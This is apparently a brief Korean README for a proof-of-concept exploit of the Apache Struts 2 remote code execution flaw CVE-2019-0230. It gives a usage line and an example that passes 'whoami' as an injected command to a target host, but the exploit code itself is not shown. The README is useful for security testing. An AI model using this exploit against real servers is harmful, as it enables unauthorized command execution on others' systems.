
Apache Struts 2 원격 코드 실행 취약점 CVE-2019-0230에 대한 개념 증명 익스플로잇으로, 조작된 HTTP 요청을 통해 명령어 주입을 가능하게 합니다.
CVE-2019-0230 익스플로잇
이것은 CVE-2019-0230 익스플로잇입니다.
python3 cve-2019-230.py <url or ip> <command>
예시:
# python3 cve-2019-0230-poc.py pentest.com whoami
Testing pentest.com!
Command being passed for RCE: whoami
2020/10/22/